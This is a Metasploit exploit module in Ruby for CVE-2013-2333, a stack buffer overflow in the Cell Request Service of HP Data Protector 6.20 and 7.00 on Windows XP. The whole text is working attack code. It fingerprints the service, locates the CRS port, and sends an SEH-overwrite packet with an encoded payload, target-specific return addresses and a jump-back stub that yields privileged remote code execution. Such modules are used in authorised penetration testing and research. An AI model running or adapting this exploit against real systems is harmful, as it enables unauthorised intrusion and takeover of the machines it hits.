HP Data Protector Cell Request Service Buffer Overflow

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'HP Data Protector Cell Request Service Buffer Overflow',  
'Description' => %q{  
This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector  
product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell  
Request Service (crs.exe) when parsing packets with opcode 211. This module has been tested  
successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.  
},  
'Author' =>  
[  
'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability discovery  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2013-2333' ],  
[ 'OSVDB', '93867' ],  
[ 'BID', '60309' ],  
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-130/' ]  
],  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 4096,  
'BadChars' => "\x00\xff\x20" # "\x00\x00", "\xff\xff" and "\x20\x00" not allowed  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', {} ],  
[ 'HP Data Protector 6.20 build 370 / Windows XP SP3',  
{  
'Ret' => 0x00436fe2, # ppr from crs.exe  
'Offset' => 15578  
}  
],  
[ 'HP Data Protector 7.00 build 72 / Windows XP SP3',  
{  
'Ret' => 0x004cf8c1, # ppr from crs.exe  
'Offset' => 15578  
}  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jun 03 2013'))  
  
deregister_options('RPORT') # The CRS service runs on a random port  
end  
  
def build_pkt(fields)  
data = "\xff\xfe" # BOM Unicode  
fields.each do |k, v|  
if k == "Payload"  
data << "#{v}\x00\x00"  
else  
data << "#{Rex::Text.to_unicode(v)}\x00\x00"  
end  
data << Rex::Text.to_unicode(" ") # Separator  
end  
  
data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator  
data << "\x00\x00" # Ending  
return [data.length].pack("N") + data  
end  
  
def get_fingerprint  
ommni = connect(false, {'RPORT' => 5555})  
ommni.put(rand_text_alpha_upper(64))  
resp = ommni.get_once(-1)  
disconnect  
  
if resp.nil?  
return nil  
end  
  
return Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last nl  
end  
  
def get_crs_port  
  
pkt = build_pkt({  
"Opcode" => "2",  
"FakeMachineName" => rand_text_alpha(8),  
"Unknown1" => "0",  
"FakeDomainUser" => rand_text_alpha(8),  
"FakeDomain" => rand_text_alpha(8),  
"FakeLanguage" => rand_text_alpha(8),  
"Unknown2" => "15"  
})  
ommni = connect(false, {'RPORT' => 5555})  
ommni.put(pkt)  
resp = ommni.get_once(-1)  
disconnect  
  
if resp.nil?  
return nil  
end  
  
res_length, bom_unicode, res_data = resp.unpack("Nna*")  
  
fields = res_data.split(Rex::Text.to_unicode(" "))  
  
opcode = fields[0]  
port = fields[1]  
  
if not opcode or not port  
vprint_error("Unexpected response")  
return nil  
end  
  
opcode = Rex::Text.to_ascii(opcode.chomp("\x00\x00"))  
  
if opcode != "109"  
vprint_error("Unexpected opcode #{opcode} in the response")  
return nil  
end  
  
port = Rex::Text.to_ascii(port.chomp("\x00\x00"))  
return port.to_i  
end  
  
def check  
fingerprint = get_fingerprint  
  
if fingerprint.nil?  
return Exploit::CheckCode::Unknown  
end  
  
port = get_crs_port  
  
if port.nil?  
print_status("HP Data Protector version #{fingerprint}")  
print_error("But CRS port not found")  
else  
print_status("CRS running on port #{port}/TCP, HP Data Protector version #{fingerprint}")  
end  
  
if fingerprint =~ /HP Data Protector A\.06\.20: INET, internal build 370/  
return Exploit::CheckCode::Vulnerable  
elsif fingerprint =~ /HP Data Protector A\.07\.00: INET, internal build 72/  
return Exploit::CheckCode::Vulnerable  
elsif fingerprint =~ /HP Data Protector A\.07\.00/  
return Exploit::CheckCode::Appears  
elsif fingerprint =~ /HP Data Protector A\.07\.01/  
return Exploit::CheckCode::Appears  
elsif fingerprint =~ /HP Data Protector A\.06\.20/  
return Exploit::CheckCode::Appears  
elsif fingerprint =~ /HP Data Protector A\.06\.21/  
return Exploit::CheckCode::Appears  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def get_target  
fingerprint = get_fingerprint  
  
if fingerprint.nil?  
return nil  
end  
  
if fingerprint =~ /HP Data Protector A\.06\.20: INET, internal build 370/  
return targets[1]  
elsif fingerprint =~ /HP Data Protector A\.07\.00: INET, internal build 72/  
return targets[2]  
else  
return nil  
end  
end  
  
def exploit  
  
if target.name =~ /Automatic/  
print_status("Trying to find the target version...")  
my_target = get_target  
else  
my_target = target  
end  
  
if my_target.nil?  
fail_with(Failure::NoTarget, "Failed to autodetect target")  
end  
  
print_status("Trying to find the CRS service port...")  
port = get_crs_port  
if port.nil?  
fail_with(Failure::NotFound, "The CRS service has not been found.")  
else  
print_good("CRS service found on #{port}/TCP")  
connect(true, {'RPORT' => port})  
end  
  
pkt = build_pkt({  
"Opcode" => "0",  
"EndPoint" => "GUICORE",  
"ClientFingerprint" => "HP OpenView OmniBack II A.06.20",  
"FakeUsername" => rand_text_alpha(8),  
"FakeDomain" => rand_text_alpha(8),  
"Unknown1" => "488",  
"Unknown2" => rand_text_alpha(8)  
})  
print_status("Sending packet with opcode 0...")  
sock.put(pkt)  
data = sock.get_once(-1)  
  
if data.nil?  
fail_with(Failure::Unknown, "Error while communicating with the CRS Service")  
end  
  
if Rex::Text.to_ascii(data) !~ /NT-5\.1/  
fail_with(Failure::NoTarget, "Exploit only compatible with Windows XP targets")  
end  
  
pkt = build_pkt({  
"Opcode" => "225"  
})  
print_status("Sending packet with opcode 225...")  
sock.put(pkt)  
data = sock.get_once(-1)  
  
if data.nil?  
fail_with(Failure::Unknown, "Error while communicating with the CRS Service")  
end  
  
bof = payload.encoded  
bof << rand_text(my_target["Offset"] - payload.encoded.length)  
bof << generate_seh_record(my_target.ret)  
bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{my_target['Offset']+8}").encode_string  
bof << rand_text(100) # Trigger Exception  
  
pkt = build_pkt({  
"Opcode" => "211",  
"Payload" => bof  
})  
print_status("Sending malicious packet with opcode 211...")  
sock.put(pkt)  
disconnect  
end  
  
end  
`